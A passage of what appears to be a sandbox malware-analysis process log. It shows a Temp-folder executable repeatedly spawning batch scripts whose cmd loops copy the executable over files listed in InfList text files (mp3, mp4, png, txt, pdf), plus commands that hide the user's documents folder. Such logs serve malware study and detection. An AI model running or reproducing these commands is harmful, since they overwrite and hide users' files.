- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:5340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:7164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:9912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:9464

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:948

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:2968
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\818F.tmp\8190.tmp\8191.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:5708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:5352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:5652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:7712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:7864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:8552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:8824

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:1460
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\D94F.tmp\D950.tmp\D951.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:9200

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:1740
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7EE0.tmp\7EE1.tmp\7EE2.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:5564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:5612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:5208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:7768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:7704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:8616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:8712
- - C:\Windows\system32\attrib.exe
    attrib +h "C:\Users\Admin\my documents"
    3⤵
    - Views/modifies file attributes
    PID:9888

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:1632
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DCF7.tmp\DD07.tmp\DD08.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:9548

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:2712
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\786B.tmp\786C.tmp\786D.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:4420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:4576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:5152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:5624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:5400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:7812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:7880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:8688
- - C:\Windows\system32\attrib.exe
    attrib +h "C:\Users\Admin\my documents"
    3⤵
    - Views/modifies file attributes
    PID:9756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:8760

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:1656

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:2804
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8FB2.tmp\8FB3.tmp\8FB4.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:5728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:2524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:9404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:9896

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:2836

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:1692

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:2528

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:2628
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\AC47.tmp\AC47.tmp\AC48.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:6880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:8220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:10224

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:2676
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E58E.tmp\E58F.tmp\E590.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:8828

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:2008
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\77EF.tmp\77EF.tmp\77FF.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:3396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:3088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:5156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:5400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:7784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:7720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:8608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:8808
- - C:\Windows\system32\attrib.exe
    attrib +h "C:\Users\Admin\my documents"
    3⤵
    - Views/modifies file attributes
    PID:10008

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:2972
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E0A0.tmp\E0CF.tmp\E0D0.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:10052

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:3028
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\93E6.tmp\93E7.tmp\93E8.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:6216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:5876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:7604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:7676

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:1976
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DBBF.tmp\DBC0.tmp\DBC1.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:9228

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:1080
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A19C.tmp\A19D.tmp\A19E.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:7100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:7800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:7856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:8704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:8776

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:1172

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:2212
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8575.tmp\8576.tmp\8577.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:6112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:5736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:5748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:7616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:7552

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:2820
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DA87.tmp\DA88.tmp\DA89.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:8296

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:2380
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B09A.tmp\B09B.tmp\B09C.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:7272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:8508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:8600

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:1984

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:2944
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\93E7.tmp\93E7.tmp\93E8.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:6228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:5864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:8136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:7716

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:2644

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:1192
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9647.tmp\9648.tmp\9649.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:6476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:8204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:8292

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:2520
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A1EB.tmp\A1EB.tmp\A1EC.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:7132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:8012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:8072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:9004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:9068

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:2156

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:2840
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\96C3.tmp\96C4.tmp\96C5.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:6500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
